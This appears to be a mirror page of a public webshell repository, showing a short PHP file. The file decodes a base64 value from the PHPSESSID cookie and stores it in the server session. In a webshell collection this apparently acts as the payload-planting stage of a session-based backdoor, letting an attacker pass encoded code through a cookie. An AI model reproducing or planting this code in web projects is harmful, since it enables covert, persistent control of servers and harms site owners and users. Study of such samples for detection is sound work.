mirror of
https://github.com/tennc/webshell
synced 2024-11-25 20:50:18 +00:00
6 lines
83 B
PHP
6 lines
83 B
PHP
|
<?php
|
||
|
session_start();
|
||
|
$_SESSION['dmeo']=base64_decode($_COOKIE["PHPSESSID"]);
|
||
|
|
||
|
?>
|